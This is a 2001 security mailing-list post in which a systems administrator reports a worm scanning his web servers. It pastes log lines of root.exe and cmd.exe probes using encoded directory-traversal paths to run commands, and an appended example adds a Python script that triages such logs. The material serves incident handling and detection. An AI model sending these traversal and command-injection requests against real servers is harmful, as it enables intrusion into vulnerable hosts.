I am as well being hit by this worm. Everything seems to be coming from the same class A 64.*. I have already seen 1500 plus scans to my web servers and that number is climbing rather fast. This seemed to suddenly pop up with little or no warning? In the past days I have seen a few scans here and there but nothing of this magnitude. I am wondering what suddenly changed to cause this type of outbreak?

2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 403 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 403 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:40 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:40 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401

– Patrick Beam
Senior Systems Administrator
Agea Corp.
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 11:19:15 PDT
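
An added example, not part of the original post: a Python triage pass over logs in the field order shown in the excerpt above, grouping root.exe/cmd.exe probes per source and separating refused requests (401/403/404) from any answered with 200. The sample lines, the addresses in them, and the thresholds min_hits and window_s are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample; fields: date time c-ip user s-ip port method uri-stem uri-query status
SAMPLE_LOG = """\
2001-09-18 13:26:03 192.0.2.10 - 10.0.0.5 80 GET /scripts/root.exe /c+dir 401 -
2001-09-18 13:26:03 192.0.2.10 - 10.0.0.5 80 GET /MSADC/root.exe /c+dir 403 -
2001-09-18 13:26:03 192.0.2.10 - 10.0.0.5 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 192.0.2.10 - 10.0.0.5 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 192.0.2.10 - 10.0.0.5 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:27:10 203.0.113.9 - 10.0.0.5 80 GET /index.html - 200 -
2001-09-18 13:31:36 198.51.100.7 - 10.0.0.5 80 GET /scripts/root.exe /c+dir 404 -
2001-09-18 13:31:36 198.51.100.7 - 10.0.0.5 80 GET /MSADC/root.exe /c+dir 403 -
2001-09-18 13:31:37 198.51.100.7 - 10.0.0.5 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:31:38 198.51.100.7 - 10.0.0.5 80 GET /winnt/system32/cmd.exe /c+dir 404 -
"""

PROBE_TARGET = re.compile(r"/(cmd|root)\.exe$", re.I)         # executables the scan requests
TRAVERSAL = re.compile(r"\.\.(%5c|%2f|[^\x00-\x7f])", re.I)   # ..%5c, ..%2f, ..<non-ASCII byte>

def parse(line):
    """Split one log line into the fields used below; None for headers or short lines."""
    f = line.split()
    if line.startswith("#") or len(f) < 10 or not f[9].isdigit():
        return None
    ts = datetime.strptime(f"{f[0]} {f[1]}", "%Y-%m-%d %H:%M:%S")
    return {"ts": ts, "src": f[2], "stem": f[7], "status": int(f[9])}

def summarize(log_text, min_hits=4, window_s=60):
    """Per source IP: probe count, traversal count, and probes answered with 200."""
    by_src = defaultdict(list)
    for rec in filter(None, map(parse, log_text.splitlines())):
        if PROBE_TARGET.search(rec["stem"]):
            by_src[rec["src"]].append(rec)
    report = {}
    for src, recs in by_src.items():
        times = [r["ts"] for r in recs]
        if len(recs) < min_hits or (max(times) - min(times)).total_seconds() > window_s:
            continue  # too few hits, or too spread out, to count as one scan burst
        report[src] = {
            "hits": len(recs),
            "traversal": sum(1 for r in recs if TRAVERSAL.search(r["stem"])),
            "served": [r["stem"] for r in recs if r["status"] == 200],
        }
    return report

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

A non-empty "served" list marks a host that answered a probe and needs hands-on investigation; an empty one, as with the 401/403 responses in the post, means the requests were refused.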